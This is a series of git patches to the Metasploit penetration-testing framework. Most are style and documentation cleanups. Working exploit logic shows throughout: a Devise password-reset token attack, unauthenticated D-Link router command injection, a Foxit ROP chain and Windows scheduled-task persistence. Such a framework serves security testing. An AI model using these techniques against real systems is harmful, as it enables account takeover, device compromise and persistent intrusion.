a/modules/auxiliary/admin/http/rails_devise_pass_reset.rb b/modules/auxiliary/admin/http/rails_devise_pass_reset.rb index 4f577afadd95..af7a02dd0207 100644 --- a/modules/auxiliary/admin/http/rails_devise_pass_reset.rb +++ b/modules/auxiliary/admin/http/rails_devise_pass_reset.rb @@ -26,75 +26,72 @@ def initialize(info = {}) but these may require adjustment for implementations which customize them. Affects Devise < v2.2.3, 2.1.3, 2.0.5 and 1.5.4 when backed by any database - except PostgreSQL or SQLite3. - - Tested w/ v2.2.2, 2.1.2, and 2.0.4. + except PostgreSQL or SQLite3. Tested with v2.2.2, 2.1.2, and 2.0.4. }, 'Author' => [ 'joernchen', #original discovery and disclosure - 'jjarmoc', #metasploit module + 'jjarmoc' #metasploit module ], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2013-0233'], + [ 'OSVDB', '89642' ], + [ 'BID', '57577' ], [ 'URL', 'http://blog.plataformatec.com.br/2013/01/security-announcement-devise-v2-2-3-v2-1-3-v2-0-5-and-v1-5-3-released/'], - [ 'URL', 'http://www.phenoelit.org/blog/archives/2013/02/05/mysql_madness_and_rails/index.html'], + [ 'URL', 'http://www.phenoelit.org/blog/archives/2013/02/05/mysql_madness_and_rails/index.html'] ], 'DisclosureDate' => 'Jan 28 2013' )) register_options( [ - OptString.new('TARGETURI', [ true, "The request URI", '/users/password']), - OptString.new('TARGETEMAIL', [true, "The email address of target account"]), + OptString.new('TARGETURI', [ true, 'The request URI', '/users/password']), + OptString.new('TARGETEMAIL', [true, 'The email address of target account']), OptString.new('PASSWORD', [true, 'The password to set']), OptBool.new('FLUSHTOKENS', [ true, 'Flush existing reset tokens before trying', true]), - OptInt.new('MAXINT', [true, "Max integer to try (tokens begining with a higher int will fail)", 10]) + OptInt.new('MAXINT', [true, 'Max integer to try (tokens begining with a higher int will fail)', 10]) ], self.class) end def generate_token(account) # CSRF token from GET "/users/password/new" isn't actually validated it seems. - print_status("Generating reset token for #{account}") - postdata="user[email]=#{account}" res = send_request_cgi({ - 'uri' => normalize_uri(datastore['TARGETURI']), - 'method' => 'POST', - 'data' => postdata, - }) + 'uri' => normalize_uri(datastore['TARGETURI']), + 'method' => 'POST', + 'data' => postdata, + }) - unless (res) + unless res print_error("No response from server") return false end if res.code == 200 error_text = res.body[/<div id=\"error_explanation\">\n\s+(.*?)<\/div>/m, 1] - print_error("Server returned an error:") - print_error(error_text) + print_error("Server returned error") + vprint_error(error_text) return false end + return true end def clear_tokens() - print_status("Clearing existing tokens") count = 0 status = true until (status == false) do status = reset_one(Rex::Text.rand_text_alpha(rand(10) + 5)) count += 1 if status end - print_status("Cleared #{count} tokens") + vprint_status("Cleared #{count} tokens") end def reset_one(password, report=false) - print_status("Resetting password to \"#{password}\"") if report (0..datastore['MAXINT']).each{ |int_to_try| encode_pass = REXML::Text.new(password).to_s @@ -112,7 +109,8 @@ def reset_one(password, report=false) 'ctype' => 'application/xml', 'data' => xml, }) - unless (res) + + unless res print_error("No response from server") return false end @@ -123,8 +121,8 @@ def reset_one(password, report=false) # May need to tweak this for some apps... error_text = res.body[/<div id=\"error_explanation\">\n\s+(.*?)<\/div>/m, 1] if (report) && (error_text !~ /token/) - print_error("Server returned an error:") - print_error(error_text) + print_error("Server returned error") + vprint_error(error_text) return false end when 302 @@ -136,27 +134,29 @@ def reset_one(password, report=false) end } - print_error("No active reset tokens below #{datastore['MAXINT']} remain. - Try a higher MAXINT.") if report + print_error("No active reset tokens below #{datastore['MAXINT']} remain. Try a higher MAXINT.") if report return false end def run # Clear outstanding reset tokens, helps ensure we hit the intended account. + print_status("Clearing existing tokens...") clear_tokens() if datastore['FLUSHTOKENS'] # Generate a token for our account + print_status("Generating reset token for #{datastore['TARGETEMAIL']}...") status = generate_token(datastore['TARGETEMAIL']) if status == false - print_error("Failed") + print_error("Failed to generate reset token") return end - print_good("Success") + print_good("Reset token generated successfully") # Reset a password. We're racing users creating other reset tokens. # If we didn't flush, we'll reset the account with the lowest ID that has a token. + print_status("Resetting password to \"#{datastore['PASSWORD']}\"...") status = reset_one(datastore['PASSWORD'], true) - status ? print_good("Success") : print_error("Failed") + status ? print_good("Password reset worked successfully") : print_error("Failed to reset password") end end \ No newline at end of file From 0ae473b01016f0f7ff76f370dc24f2ff1309ed60 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan.vazquez@metasploit.com> Date: Wed, 13 Feb 2013 09:52:17 +0100 Subject: [PATCH 377/421] info updated with rails information --- modules/auxiliary/admin/http/rails_devise_pass_reset.rb | 8 ++++++-- 1 file changed, 6 insertions(+), 2 deletions(-) diff --git a/modules/auxiliary/admin/http/rails_devise_pass_reset.rb b/modules/auxiliary/admin/http/rails_devise_pass_reset.rb index af7a02dd0207..c242cefe8b93 100644 --- a/modules/auxiliary/admin/http/rails_devise_pass_reset.rb +++ b/modules/auxiliary/admin/http/rails_devise_pass_reset.rb @@ -26,7 +26,10 @@ def initialize(info = {}) but these may require adjustment for implementations which customize them. Affects Devise < v2.2.3, 2.1.3, 2.0.5 and 1.5.4 when backed by any database - except PostgreSQL or SQLite3. Tested with v2.2.2, 2.1.2, and 2.0.4. + except PostgreSQL or SQLite3. Tested with v2.2.2, 2.1.2, and 2.0.4 on Rails + 3.2.11. Patch applied to Rails 3.2.12 should prevent exploitation of this + vulnerability, by quoting numeric values when comparing them with non numeric + values. }, 'Author' => [ @@ -40,7 +43,8 @@ def initialize(info = {}) [ 'OSVDB', '89642' ], [ 'BID', '57577' ], [ 'URL', 'http://blog.plataformatec.com.br/2013/01/security-announcement-devise-v2-2-3-v2-1-3-v2-0-5-and-v1-5-3-released/'], - [ 'URL', 'http://www.phenoelit.org/blog/archives/2013/02/05/mysql_madness_and_rails/index.html'] + [ 'URL', 'http://www.phenoelit.org/blog/archives/2013/02/05/mysql_madness_and_rails/index.html'], + [ 'URL', 'https://github.com/rails/rails/commit/921a296a3390192a71abeec6d9a035cc6d1865c8' ] ], 'DisclosureDate' => 'Jan 28 2013' )) From d1784babea24a15dd6d875e0eb45c4b4020065a1 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan.vazquez@metasploit.com> Date: Wed, 13 Feb 2013 20:24:49 +0100 Subject: [PATCH 378/421] little cleanup plus msftidy compliant --- .../http/dlink_dir_300_600_exec_noauth.rb | 35 ++++++++++--------- 1 file changed, 18 insertions(+), 17 deletions(-) diff --git a/modules/auxiliary/admin/http/dlink_dir_300_600_exec_noauth.rb b/modules/auxiliary/admin/http/dlink_dir_300_600_exec_noauth.rb index 2c0da88e4f7f..87d1f4519290 100644 --- a/modules/auxiliary/admin/http/dlink_dir_300_600_exec_noauth.rb +++ b/modules/auxiliary/admin/http/dlink_dir_300_600_exec_noauth.rb @@ -15,20 +15,22 @@ def initialize(info = {}) super(update_info(info, 'Name' => 'D-Link DIR-600 / DIR-300 Unauthenticated Remote Command Execution', 'Description' => %q{ - Some D-Link Routers like the DIR-600 rev B and the DIR-300 rev B are - vulnerable to OS Command injection. - You do not need credentials to the webinterface because the command.php - is accesseble without authentication. You could read the plaintext password - file. Tested versions: DIR-600 2.14b01 and below, DIR-300 rev B 2.13 and below. - Hint: To get a remote shell you could start the telnetd without any authentication. + This module exploits an OS Command Injection vulnerability in some D-Link + Routers like the DIR-600 rev B and the DIR-300 rev B. The vulnerability exists in + command.php, which is accessible without authentication. This module has been + tested with the versions DIR-600 2.14b01 and below, DIR-300 rev B 2.13 and below. + In order to get a remote shell the telnetd could be started without any + authentication. }, 'Author' => [ 'm-1-k-3' ], 'License' => MSF_LICENSE, 'References' => [ - [ 'URL', 'http://www.dlink.de/cs/Satellite?c=Product_C&childpagename=DLinkEurope-DE%2FDLTechProduct&cid=1197381489628&p=1197318958220&packedargs=QuickLinksParentID%3D1197318958220%26locale%3D1195806663795&pagename=DLinkEurope-DE%2FDLWrapper' ], + [ 'OSVDB', '89861' ], + [ 'EDB', '24453' ], + [ 'URL', 'http://www.dlink.com/uk/en/home-solutions/connect/routers/dir-600-wireless-n-150-home-router' ], [ 'URL', 'http://www.s3cur1ty.de/home-network-horror-days' ], - [ 'URL', 'http://www.s3cur1ty.de/m1adv2013-003' ], + [ 'URL', 'http://www.s3cur1ty.de/m1adv2013-003' ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Feb 04 2013')) @@ -52,23 +54,22 @@ def run { 'uri' => uri, 'method' => 'POST', - 'data' => data_cmd, + 'data' => data_cmd }) - return :abort if res.nil? - return :abort if (res.headers['Server'].nil? or res.headers['Server'] !~ /Linux\,\ HTTP\/1.1,\ DIR/) - return :abort if (res.code == 404) - + return if res.nil? + return if (res.headers['Server'].nil? or res.headers['Server'] !~ /Linux\,\ HTTP\/1.1,\ DIR/) + return if res.code == 404 rescue ::Rex::ConnectionError vprint_error("#{rhost}:#{rport} - Failed to connect to the web server") return end - - if res.body.include? "end" - print_status("#{rhost}:#{rport} - Exploited successfully\n") + + if res.body.include?("end") + print_good("#{rhost}:#{rport} - Exploited successfully\n") print_line("#{rhost}:#{rport} - Command: #{datastore['CMD']}\n") print_line("#{rhost}:#{rport} - Output: #{res.body}") else - print_status("#{rhost}:#{rport} - Exploit failed.") + print_error("#{rhost}:#{rport} - Exploit failed.") end end end From 4074a12fd7af4e94135097ded57db9cf67f37fea Mon Sep 17 00:00:00 2001 From: sinn3r <msfsinn3r@gmail.com> Date: Wed, 13 Feb 2013 14:12:52 -0600 Subject: [PATCH 379/421] Randomize some gadgets --- .../browser/foxit_reader_plugin_url_bof.rb | 56 +++++++++++-------- 1 file changed, 32 insertions(+), 24 deletions(-) diff --git a/modules/exploits/windows/browser/foxit_reader_plugin_url_bof.rb b/modules/exploits/windows/browser/foxit_reader_plugin_url_bof.rb index 7e5d6353a3b9..79df79fbcfc8 100644 --- a/modules/exploits/windows/browser/foxit_reader_plugin_url_bof.rb +++ b/modules/exploits/windows/browser/foxit_reader_plugin_url_bof.rb @@ -92,37 +92,45 @@ def get_target(agent) return nil end + def junk + return rand_text_alpha(4).unpack("L")[0].to_i + end + + def nops + make_nops(4).unpack("N*") + end + # Uses rop chain from npFoxitReaderPlugin.dll (foxit) (no ASLR module) def win7_rop_chain # rop chain generated with mona.py - www.corelan.be rop_gadgets = [ - 0x1000ce1a, # POP EAX # RETN [npFoxitReaderPlugin.dll] - 0x100361a8, # ptr to &VirtualAlloc() [IAT npFoxitReaderPlugin.dll] - 0x1000f055, # MOV EAX,DWORD PTR DS:[EAX] # RETN [npFoxitReaderPlugin.dll] - 0x10021081, # PUSH EAX # POP ESI # RETN 0x04 [npFoxitReaderPlugin.dll] - 0x10007971, # POP EBP # RETN [npFoxitReaderPlugin.dll] - 0x41414141, # Filler (RETN offset compensation) - 0x1000614c, # & push esp # ret [npFoxitReaderPlugin.dll] - 0x100073fa, # POP EBX # RETN [npFoxitReaderPlugin.dll] - 0x00001000, # 0x00001000-> edx + 0x1000ce1a, # POP EAX # RETN [npFoxitReaderPlugin.dll] + 0x100361a8, # ptr to &VirtualAlloc() [IAT npFoxitReaderPlugin.dll] + 0x1000f055, # MOV EAX,DWORD PTR DS:[EAX] # RETN [npFoxitReaderPlugin.dll] + 0x10021081, # PUSH EAX # POP ESI # RETN 0x04 [npFoxitReaderPlugin.dll] + 0x10007971, # POP EBP # RETN [npFoxitReaderPlugin.dll] + 0x41414141, # Filler (RETN offset compensation) + 0x1000614c, # & push esp # ret [npFoxitReaderPlugin.dll] + 0x100073fa, # POP EBX # RETN [npFoxitReaderPlugin.dll] + 0x00001000, # 0x00001000-> edx 0x1000d9ec, # XOR EDX, EDX # RETN - 0x1000d9be, # ADD EDX,EBX # POP EBX # RETN 0x10 [npFoxitReaderPlugin.dll] - 0x41414141, # Filler (compensate) - 0x100074a7, # POP ECX # RETN [npFoxitReaderPlugin.dll] - 0x41414141, # Filler (RETN offset compensation) - 0x41414141, # Filler (RETN offset compensation) - 0x41414141, # Filler (RETN offset compensation) - 0x41414141, # Filler (RETN offset compensation) - 0x00000040, # 0x00000040-> ecx - 0x1000e4ab, # POP EBX # RETN [npFoxitReaderPlugin.dll] - 0x00000001, # 0x00000001-> ebx - 0x1000dc86, # POP EDI # RETN [npFoxitReaderPlugin.dll] - 0x1000eb81, # RETN (ROP NOP) [npFoxitReaderPlugin.dll] - 0x1000c57d, # POP EAX # RETN [npFoxitReaderPlugin.dll] - 0x90909090, # nop - 0x10005638, # PUSHAD # RETN [npFoxitReaderPlugin.dll] + 0x1000d9be, # ADD EDX,EBX # POP EBX # RETN 0x10 [npFoxitReaderPlugin.dll] + junk, + 0x100074a7, # POP ECX # RETN [npFoxitReaderPlugin.dll] + junk, + junk, + junk, + 0x41414141, # Filler (RETN offset compensation) + 0x00000040, # 0x00000040-> ecx + 0x1000e4ab, # POP EBX # RETN [npFoxitReaderPlugin.dll] + 0x00000001, # 0x00000001-> ebx + 0x1000dc86, # POP EDI # RETN [npFoxitReaderPlugin.dll] + 0x1000eb81, # RETN (ROP NOP) [npFoxitReaderPlugin.dll] + 0x1000c57d, # POP EAX # RETN [npFoxitReaderPlugin.dll] + nops, + 0x10005638, # PUSHAD # RETN [npFoxitReaderPlugin.dll] ].flatten.pack("V*") return rop_gadgets From aea76a56de82d51e0f3a3e9dd1a19c588260a963 Mon Sep 17 00:00:00 2001 From: James Lee <egypt@metasploit.com> Date: Wed, 13 Feb 2013 14:39:19 -0600 Subject: [PATCH 380/421] Add some docs to FtpServer --- lib/msf/core/exploit/ftpserver.rb | 30 ++++++++++++++++++++++++++++++ 1 file changed, 30 insertions(+) diff --git a/lib/msf/core/exploit/ftpserver.rb b/lib/msf/core/exploit/ftpserver.rb index 48517b3862ad..dadbb31dcdc7 100644 --- a/lib/msf/core/exploit/ftpserver.rb +++ b/lib/msf/core/exploit/ftpserver.rb @@ -26,11 +26,13 @@ def initialize(info = {}) ], Msf::Exploit::Remote::FtpServer) end + # (see Msf::Exploit#setup) def setup super @state = {} end + # (see TcpServer#on_client_connect) def on_client_connect(c) @state[c] = { :name => "#{c.peerhost}:#{c.peerport}", @@ -46,6 +48,25 @@ def on_client_connect(c) c.put "220 FTP Server Ready\r\n" end + # Dispatches client requests to command handlers. + # + # Handlers should be named +on_client_command_*+, ending with a + # downcased FTP verb, e.g. +on_client_command_user+. If no handler + # exists for the given command, returns a generic default response. + # + # @example Handle SYST requests + # class Metasploit4 < Msf::Exploit + # include Msf::Exploit::Remote::FtpServer + # ... + # def on_client_command_syst(cmd_conn, arg) + # print_status("Responding to SYST request") + # buf = build_exploit_buffer(cmd_conn) + # cmd_conn.put("215 Unix Type: #{buf}\r\n") + # end + # end + # + # @param (see TcpServer#on_client_data) + # @return (see TcpServer#on_client_data) def on_client_data(c) data = c.get_once return if not data @@ -184,6 +205,15 @@ def active_data_port_for_client(c,port) end + # Create a socket for the protocol data, either PASV or PORT, + # depending on the client. + # + # @see http://tools.ietf.org/html/rfc3659 RFC 3659 + # @see http://tools.ietf.org/html/rfc959 RFC 959 + # @param c [Socket] Control connection socket + # + # @return [Socket] A connected socket for the data connection + # @return [nil] on failure def establish_data_connection(c) begin Timeout.timeout(20) do From bbf8fe0213ed884e0745b748029182313d9149cb Mon Sep 17 00:00:00 2001 From: smilingraccoon <smilingraccoon.gmail.com> Date: Wed, 13 Feb 2013 18:10:05 -0500 Subject: [PATCH 381/421] Use Post::File methods and fail_with --- .../exploits/windows/local/s4u_persistence.rb | 72 +++++++------------ 1 file changed, 26 insertions(+), 46 deletions(-) diff --git a/modules/exploits/windows/local/s4u_persistence.rb b/modules/exploits/windows/local/s4u_persistence.rb index 0d5189064ac6..9f00f8d5283c 100644 --- a/modules/exploits/windows/local/s4u_persistence.rb +++ b/modules/exploits/windows/local/s4u_persistence.rb @@ -39,6 +39,7 @@ def initialize(info={}) 'Platform' => [ 'windows' ], 'SessionTypes' => [ 'meterpreter' ], 'Targets' => [ [ 'Windows', {} ] ], + 'DisclosureDate' => [ 'Jan 2 2013' ], 'DefaultTarget' => 0, 'References' => [ [ 'URL', 'http://www.pentestgeek.com/2013/02/11/scheduled-tasks-with-s4u-and-on-demand-persistence/'], @@ -66,15 +67,13 @@ def initialize(info={}) def exploit if not (sysinfo['OS'] =~ /Build [6-9]\d\d\d/) - print_error("This module only works on Vista/2008 and above") - return + fail_with(Exploit::Failure::NoTarget, "This module only works on Vista/2008 and above") end if datastore['TRIGGER'] == "event" if datastore['EVENT_LOG'].nil? or datastore['EVENT_ID'].nil? - print_error("Advanced options EVENT_LOG and EVENT_ID required for event") print_status("The properties of any event in the event viewer will contain this information") - return + fail_with(Exploit::Failure::BadConfig, "Advanced options EVENT_LOG and EVENT_ID required for event") end end @@ -88,8 +87,7 @@ def exploit xml_path,rexe_path = generate_path(rexename) # Upload REXE to victim fs - upload_response = upload_rexe(rexe_path, payload) - return if not upload_response + upload_rexe(rexe_path, payload) # Create basic XML outline xml = create_xml(rexe_path) @@ -98,16 +96,13 @@ def exploit xml = add_xml_triggers(xml) # Write XML to victim fs, if fail clean up - if not write_xml(xml, xml_path) - delete_file(rexe_path) - return - end + write_xml(xml, xml_path, rexe_path) # Name task with Opt or give random name schname = datastore['RTASKNAME'] || Rex::Text.rand_text_alpha((rand(8)+6)) # Create task with modified XML - task = create_task(xml_path, schname, rexe_path) + create_task(xml_path, schname, rexe_path) end ############################################################## @@ -115,16 +110,11 @@ def exploit # Returns name def generate_rexename - if datastore['REXENAME'].nil? - rexename = Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe" - return rexename - elsif datastore['REXENAME'] =~ /\.exe$/ - rexename = datastore['REXENAME'] - return rexename - else + rexename = datastore['REXENAME'] || Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe" + if not rexename =~ /\.exe$/ print_warning("#{datastore['REXENAME']} isn't an exe") - return rexename end + return rexename end ############################################################## @@ -133,7 +123,7 @@ def generate_rexename def generate_path(rexename) # generate a path to write payload and xml - path = datastore['PATH'] || session.fs.file.expand_path("%TEMP%") + path = datastore['PATH'] || expand_path("%TEMP%") xml_path = "#{path}\\#{Rex::Text.rand_text_alpha((rand(8)+6))}.xml" rexe_path = "#{path}\\#{rexename}" return xml_path,rexe_path @@ -146,19 +136,15 @@ def generate_path(rexename) def upload_rexe(path, payload) vprint_status("Uploading #{path}") if file? path - print_error("File #{path} already exists...exiting") - return false + fail_with(Exploit::Failure::Unknown, "File #{path} already exists...exiting") end begin - fd = client.fs.file.new(path, "wb") - fd.write(payload) - fd.close - rescue - print_error("Could not upload to #{path}") - return false + write_file(path, payload) + rescue => e + puts e + fail_with(Exploit::Failure::Unknown, "Could not upload to #{path}") end print_status("Successfully uploaded remote executable to #{path}") - return true end ############################################################## @@ -317,21 +303,18 @@ def create_trigger_event_tags(log, line, xml) # Takes the XML and a path and writes file to filesystem # Returns boolean for success - def write_xml(xml, path) + def write_xml(xml, path, rexe_path) + if file? path + delete_file(rexe_path) + fail_with(Exploit::Failure::Unknown, "File #{path} already exists...exiting") + end begin - if file? path - print_error("File #{path} already exists...exiting") - return false - end - fd = session.fs.file.new(path, "wb") - fd.write(xml) - fd.close + write_file(path, xml) rescue - print_error("Issues writing XML to #{path}") - return false + delete_file(rexe_path) + fail_with(Exploit::Failure::Unknown, "Issues writing XML to #{path}") end print_status("Successfully wrote XML file to #{path}") - return true end ############################################################## @@ -340,12 +323,10 @@ def write_xml(xml, path) def delete_file(path) begin - session.fs.file.rm(path) + file_rm(path) rescue print_warning("Could not delete file #{path}, delete manually") - return false end - return true end ############################################################## @@ -381,14 +362,13 @@ def create_task(path, schname, rexe_path) :delete_commands => del_task } ) - return true elsif create_task_response =~ /ERROR: Cannot create a file when that file already exists/ print_error("The scheduled task name is already in use") # Clean up delete_file(rexe_path) delete_file(path) else - print_error("Issues creating task using XML file schtasks") + error = "Issues creating task using XML file schtasks" vprint_error("Error: #{create_task_response}") if datastore['EVENT_LOG'] == 'Security' and datastore['TRIGGER'] == "Event" print_warning("Security log can restricted by UAC, try a different trigger") @@ -396,7 +376,7 @@ def create_task(path, schname, rexe_path) # Clean up delete_file(rexe_path) delete_file(path) - return false + fail_with(Exploit::Failure::Unknown, error) end end end \ No newline at end of file From e78cbdd14d40c544c20170888af5bb0ddb039f8d Mon Sep 17 00:00:00 2001 From: smilingraccoon <smilingraccoon.gmail.com> Date: Wed, 13 Feb 2013 18:17:38 -0500 Subject: [PATCH 382/421] missed one line --- modules/exploits/windows/local/s4u_persistence.rb | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/modules/exploits/windows/local/s4u_persistence.rb b/modules/exploits/windows/local/s4u_persistence.rb index 9f00f8d5283c..5556acfbdbb3 100644 --- a/modules/exploits/windows/local/s4u_persistence.rb +++ b/modules/exploits/windows/local/s4u_persistence.rb @@ -363,10 +363,11 @@ def create_task(path, schname, rexe_path) } ) elsif create_task_response =~ /ERROR: Cannot create a file when that file already exists/ - print_error("The scheduled task name is already in use") # Clean up delete_file(rexe_path) delete_file(path) + error = "The scheduled task name is already in use" + fail_with(Exploit::Failure::Unknown, error) else error = "Issues creating task using XML file schtasks" vprint_error("Error: #{create_task_response}") From c2f8e4adbdcb8add16d7fff2abaddc72bc514e3b Mon Sep 17 00:00:00 2001 From: Jeff Jarmoc <jeff@jarmoc.com> Date: Wed, 13 Feb 2013 22:30:54 -0600 Subject: [PATCH 383/421] Minor - Note Rails 3.1.11 patch in Description. --- modules/auxiliary/admin/http/rails_devise_pass_reset.rb | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/modules/auxiliary/admin/http/rails_devise_pass_reset.rb b/modules/auxiliary/admin/http/rails_devise_pass_reset.rb index c242cefe8b93..e301b59c2bd5 100644 --- a/modules/auxiliary/admin/http/rails_devise_pass_reset.rb +++ b/modules/auxiliary/admin/http/rails_devise_pass_reset.rb @@ -27,9 +27,9 @@ def initialize(info = {}) Affects Devise < v2.2.3, 2.1.3, 2.0.5 and 1.5.4 when backed by any database except PostgreSQL or SQLite3. Tested with v2.2.2, 2.1.2, and 2.0.4 on Rails - 3.2.11. Patch applied to Rails 3.2.12 should prevent exploitation of this - vulnerability, by quoting numeric values when comparing them with non numeric - values. + 3.2.11. Patch applied to Rails 3.2.12 and 3.1.11 should prevent exploitation + of this vulnerability, by quoting numeric values when comparing them with + non numeric values. }, 'Author' => [ @@ -44,7 +44,8 @@ def initialize(info = {}) [ 'BID', '57577' ], [ 'URL', 'http://blog.plataformatec.com.br/2013/01/security-announcement-devise-v2-2-3-v2-1-3-v2-0-5-and-v1-5-3-released/'], [ 'URL', 'http://www.phenoelit.org/blog/archives/2013/02/05/mysql_madness_and_rails/index.html'], - [ 'URL', 'https://github.com/rails/rails/commit/921a296a3390192a71abeec6d9a035cc6d1865c8' ] + [ 'URL', 'https://github.com/rails/rails/commit/921a296a3390192a71abeec6d9a035cc6d1865c8' ], + [ 'URL', 'https://github.com/rails/rails/commit/26e13c3ca71cbc7859cc4c51e64f3981865985d8'] ], 'DisclosureDate' => 'Jan 28 2013' )) From 7b2c1afadb99a73f8f9ab3e55b96550e892b7494 Mon Sep 17 00:00:00 2001 From: Thomas McCarthy <smilingraccoon@gmail.com> Date: Thu, 14 Feb 2013 09:16:47 -0500 Subject: [PATCH 384/421] I'm an idiot, fix logon xpath --- modules/exploits/windows/local/s4u_persistence.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/exploits/windows/local/s4u_persistence.rb b/modules/exploits/windows/local/s4u_persistence.rb index 5556acfbdbb3..1d5d2cc0bb29 100644 --- a/modules/exploits/windows/local/s4u_persistence.rb +++ b/modules/exploits/windows/local/s4u_persistence.rb @@ -193,7 +193,7 @@ def add_xml_triggers(xml) when 'logon' # Trigger based on winlogon event, checks windows license key after logon print_status("This trigger triggers on event 4101 which validates the Windows license") - line = "(EventID=4101) and *[System[Provider[@Name='Microsoft-Windows-Winlogon']]]" + line = "*[System[EventID='4101']] and *[System[Provider[@Name='Microsoft-Windows-Winlogon']]]" xml = create_trigger_event_tags("Application", line, xml) when 'lock' @@ -380,4 +380,4 @@ def create_task(path, schname, rexe_path) fail_with(Exploit::Failure::Unknown, error) end end -end \ No newline at end of file +end From e8ccfae048f93948164bbc4d279397f502feaa8c Mon Sep 17 00:00:00 2001 From: Carlos Perez <carlos_perez@darkoperator.com> Date: Thu, 14 Feb 2013 15:38:17 -0400 Subject: [PATCH 385/421] Fix spelling problems --- modules/auxiliary/gather/dns_srv.rb | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/modules/auxiliary/gather/dns_srv.rb b/modules/auxiliary/gather/dns_srv.rb index 71f95c161dc9..eac4bbe21429 100644 --- a/modules/auxiliary/gather/dns_srv.rb +++ b/modules/auxiliary/gather/dns_srv.rb @@ -16,7 +16,7 @@ def initialize(info = {}) super(update_info(info, 'Name' => 'DNS Reverse Lookup', 'Description' => %q{ - This module enumerates common DNS Service Records. + The module enumerates common DNS Service Records. }, 'Author' => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>' ], 'License' => BSD_LICENSE @@ -24,14 +24,14 @@ def initialize(info = {}) register_options( [ - OptString.new('DOMAIN', [ true, "The target domain name"]), - OptBool.new( 'ALL_NS', [ false, "Run against all Nameservers for the given domain",false]), + OptString.new('DOMAIN', [ true, "The target domain name."]), + OptBool.new( 'ALL_NS', [ false, "Run against all name servers for the given domain.",false]), ], self.class) register_advanced_options( [ - OptInt.new('RETRY', [ false, "Number of times to try to resolve a record if no response is received", 3]), - OptInt.new('RETRY_INTERVAL', [ false, "Number of seconds to wait before doing a retry", 4]), + OptInt.new('RETRY', [ false, "Number of times to try to resolve a record if no response is received.", 3]), + OptInt.new('RETRY_INTERVAL', [ false, "Number of seconds to wait before doing a retry.", 4]), ], self.class) end From 1872b137f5be2515dfe759a93d82934ed3e6aae7 Mon Sep 17 00:00:00 2001 From: Carlos Perez <carlos_perez@darkoperator.com> Date: Thu, 14 Feb 2013 15:41:17 -0400 Subject: [PATCH 386/421] Fix spelling problems --- modules/auxiliary/gather/dns_info.rb | 16 ++++++++-------- 1 file changed, 8 insertions(+), 8 deletions(-) diff --git a/modules/auxiliary/gather/dns_info.rb b/modules/auxiliary/gather/dns_info.rb index a6f0ff2b80bd..fd11a82a7122 100644 --- a/modules/auxiliary/gather/dns_info.rb +++ b/modules/auxiliary/gather/dns_info.rb @@ -16,8 +16,8 @@ def initialize(info = {}) super(update_info(info, 'Name' => 'DNS Base Information', 'Description' => %q{ - This module enumerates basic DNS information for a given Domain. Information - enumerated is A, AAAA, NS and MX Records for the given domain. + The module enumerates basic DNS information for a given domain. Information + enumerated is A, AAAA, NS and MX records for the given domain. }, 'Author' => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>' ], 'License' => BSD_LICENSE @@ -26,14 +26,14 @@ def initialize(info = {}) register_options( [ OptString.new('DOMAIN', [ true, "The target domain name"]), - OptAddress.new('NS', [ false, "Specify the nameserver to use for queries, otherwise use the system DNS" ]), + OptAddress.new('NS', [ false, "Specify the name server to use for queries, otherwise use the system configured DNS Server is used." ]), ], self.class) register_advanced_options( [ - OptInt.new('RETRY', [ false, "Number of times to try to resolve a record if no response is received", 2]), - OptInt.new('RETRY_INTERVAL', [ false, "Number of seconds to wait before doing a retry", 2]), + OptInt.new('RETRY', [ false, "Number of tries to resolve a record if no response is received.", 2]), + OptInt.new('RETRY_INTERVAL', [ false, "Number of seconds to wait before doing a retry.", 2]), ], self.class) end @@ -98,9 +98,9 @@ def wildcard(target) rendsub = rand(10000).to_s query = @res.query("#{rendsub}.#{target}", "A") if query.answer.length != 0 - print_status("This Domain has Wildcards Enabled!!") + print_status("This Domain has Wild-cards Enabled!!") query.answer.each do |rr| - print_status("Wildcard IP for #{rendsub}.#{target} is: #{rr.address.to_s}") if rr.class != Net::DNS::RR::CNAME + print_status("Wild-card IP for #{rendsub}.#{target} is: #{rr.address.to_s}") if rr.class != Net::DNS::RR::CNAME report_note(:host => datastore['DOMAIN'], :proto => 'UDP', :port => 53, @@ -228,7 +228,7 @@ def get_mx(target) #--------------------------------------------------------------------------------- def switchdns() - print_status("Using DNS Server: #{datastore['NS']}") + print_status("Using DNS server: #{datastore['NS']}") @res.nameserver=(datastore['NS']) @nsinuse = datastore['NS'] end From 7f97ff271f9ffafb691d820b21ac2af9a7dcc7d3 Mon Sep 17 00:00:00 2001 From: Carlos Perez <carlos_perez@darkoperator.com> Date: Thu, 14 Feb 2013 15:44:32 -0400 Subject: [PATCH 387/421] Fix spelling problems --- modules/auxiliary/gather/dns_bruteforce.rb | 16 ++++++++-------- 1 file changed, 8 insertions(+), 8 deletions(-) diff --git a/modules/auxiliary/gather/dns_bruteforce.rb b/modules/auxiliary/gather/dns_bruteforce.rb index 070c32f0cca3..99a5e3043458 100644 --- a/modules/auxiliary/gather/dns_bruteforce.rb +++ b/modules/auxiliary/gather/dns_bruteforce.rb @@ -14,9 +14,9 @@ class Metasploit3 < Msf::Auxiliary def initialize(info = {}) super(update_info(info, - 'Name' => 'DNS Host and Subdomain Brutefoce Module', + 'Name' => 'DNS host and subdomain brutefoce module', 'Description' => %q{ - This module uses a dictionary to perform a bruteforce on Hostnames and Subdomains + The module uses a dictionary to perform a bruteforce on hostnames and subdomains available under a given domain. }, 'Author' => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>' ], @@ -26,7 +26,7 @@ def initialize(info = {}) register_options( [ OptString.new('DOMAIN', [ true, "The target domain name"]), - OptAddress.new('NS', [ false, "Specify the nameserver to use for queries, otherwise use the system DNS" ]), + OptAddress.new('NS', [ false, "Specify the name server to use for queries, otherwise use the system DNS" ]), OptPath.new('WORDLIST', [ false, "Wordlist file for domain name brute force.", File.join(Msf::Config.install_root, "data", "wordlists", 